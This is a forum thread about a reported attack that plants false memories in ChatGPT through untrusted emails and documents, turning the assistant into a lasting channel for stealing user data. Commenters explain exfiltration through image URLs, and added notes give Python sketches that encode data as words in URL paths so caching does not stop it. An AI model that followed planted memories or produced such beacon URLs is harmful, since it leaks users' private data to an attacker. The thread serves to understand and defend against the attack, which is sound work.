Technology @lemmy.world captainkangaroo @discuss.tchncs.de 2mo ago

Hacker plants false memories in ChatGPT to steal user data in perpetuity

Emails, documents, and other untrusted content can plant malicious memories.

Technik @feddit.org effzehkoelle @feddit.org 2mo ago

arstechnica.com /security/2024/09/false-memories-planted-in-chatgpt-give-hacker-persistent-exfiltration-channel/

27 comments

How is the application able to send data to any website? Like even if you as the legit user explicitly asked it to do that?
- Haven't read details, but the classic way is to have a system visit: site.com/badimage.gif?data=abcd
  
  Note: That's also how things like email open rates are tracked, and how marketers grab info using JavaScript to craft image URLs.
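Note: a minimal sketch of the image-URL trick described above, assuming a hypothetical host `site.example` and a hypothetical query parameter named `data`. It only builds and parses the URL; no request is sent. The helper names are made up for illustration.

```python
from urllib.parse import urlencode, urlsplit, parse_qs


def build_beacon_url(base: str, data: str) -> str:
    """Append the data to the image URL as a query parameter."""
    return f"{base}?{urlencode({'data': data})}"


def read_beacon(url: str) -> str:
    """What the receiving server can recover from the requested URL alone."""
    query = urlsplit(url).query
    return parse_qs(query)["data"][0]


# Hypothetical host and payload, mirroring site.com/badimage.gif?data=abcd
url = build_beacon_url("https://site.example/badimage.gif", "abcd")
print(url)
print(read_beacon(url))
```

Whoever fetches that URL, whether a mail client or an LLM front end rendering an image, hands the `data` value to the server in its access log.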
  
  This is why every single email client for the past 2+ decades has blocked external images. This didn’t occur to the AI geniuses?
  
  IME they usually proxy and/or prefetch images for caching instead of blocking them. Only spam content is blocked by default.
  
  This wouldn't help, would it? How would you prefetch and cache:
  
  site.com/base64u-to-niceware-word-array/image.gif
  
  ? It would look like a normal image URL in any article, but actually represent data.
  
  Note: "niceware" is a way to convert binary or text data into a set of words like "cow-heart-running-something-etc".
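Note: a rough sketch of the words-in-the-path idea, not the real niceware implementation. The 16-word list here is made up so that each byte becomes two words (one per 4-bit half); the actual niceware project uses a far larger word list. The function names and `site.example` are hypothetical too.

```python
# Made-up 16-word list: one word per 4-bit value. Not the niceware list.
WORDS = [
    "cow", "heart", "running", "table", "river", "stone", "apple", "cloud",
    "green", "tiger", "paper", "music", "window", "candle", "forest", "bridge",
]
INDEX = {word: i for i, word in enumerate(WORDS)}


def encode_to_path(data: bytes) -> str:
    """Turn bytes into a hyphen-joined run of ordinary-looking words."""
    words = []
    for byte in data:
        words.append(WORDS[byte >> 4])    # high 4 bits
        words.append(WORDS[byte & 0x0F])  # low 4 bits
    return "-".join(words)


def decode_from_path(segment: str) -> bytes:
    """Reverse the encoding on the receiving side."""
    if not segment:
        return b""
    nibbles = [INDEX[word] for word in segment.split("-")]
    return bytes((hi << 4) | lo for hi, lo in zip(nibbles[0::2], nibbles[1::2]))


segment = encode_to_path(b"abcd")
print(f"https://site.example/{segment}/image.gif")
print(decode_from_path(segment))
```

The resulting path contains no query string and nothing that looks like an encoded blob, which is the point the comment above is making.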
  
  If it’s prefetched, it doesn’t matter that you reveal that it’s been “opened,” as that doesn’t reveal anything about the recipient’s behavior, other than that the email was processed by the email server.
  
  If by prefetch you mean the server grabs the images ahead of time vs the client, this does not happen, at least on any major modern platform that I know of. They will cache once a client has opened, but unique URLs per recipient are how they track the open rates.
  
  Apple’s Mail Privacy Protection does this. See https://www.reddit.com/r/privacy/comments/pt9ycv/apples_mail_privacy_protection/ for a post from three years ago talking about it.
  
  I don’t know if any other major providers take this approach but Apple / iCloud is definitely one of them.
  
  But the path changes with every new data element. It's never the same, so every "prefetch" is a whole new image in the system's eyes.
  
  Even with a unique link, if the behavior is that as soon as the email server receives it, it’s prefetched, what does that reveal about the user?
  
  Server or client, every supposed prefetch would be unique. If I trick an LLM client into grabbing:
  
  site.com/random-words-of-data/image.gif
  
  Then:
  
  site.com/more-random-data/image.gif
  
  Those are two separate images to the cache engine. As the data refreshes, the URL changes, forcing a new grab each time.
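Note: a toy illustration of why caching does not help here, assuming a cache keyed on the full URL. `UrlCache` and `fake_fetch` are hypothetical stand-ins, not any real proxy's API; the fetch function just records which URLs would have reached the origin server.

```python
class UrlCache:
    """Toy image cache keyed on the full URL."""

    def __init__(self, fetch):
        self._fetch = fetch
        self._store = {}

    def get(self, url: str) -> bytes:
        # Only an exact URL match is a cache hit; anything else goes to origin.
        if url not in self._store:
            self._store[url] = self._fetch(url)
        return self._store[url]


origin_requests = []  # URLs the (attacker-controlled) origin would see


def fake_fetch(url: str) -> bytes:
    origin_requests.append(url)
    return b"GIF89a"  # placeholder image bytes


cache = UrlCache(fake_fetch)
cache.get("https://site.example/random-words-of-data/image.gif")
cache.get("https://site.example/random-words-of-data/image.gif")  # cache hit
cache.get("https://site.example/more-random-data/image.gif")      # new path, new fetch

print(len(origin_requests))
print(origin_requests)
```

The repeated URL is served from the cache, but every new path still produces a request to the origin, and the path itself is the data.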
  
  For email, marketers do this by using a unique image URL for every recipient.
  
  Cool, all of your images are getting fetched by the server as it receives and processes the emails. You have 100% open rate on all emails to that domain within 3 minutes of send.
  
  What do you know about the user and their behavior? Nothing. The prefetch is not tied to their actions, therefore you cannot learn anything about their actions.
  
  This post isn't about email open rates, it's about data exfiltration. But for email specifically, show me major providers that prefetch by default.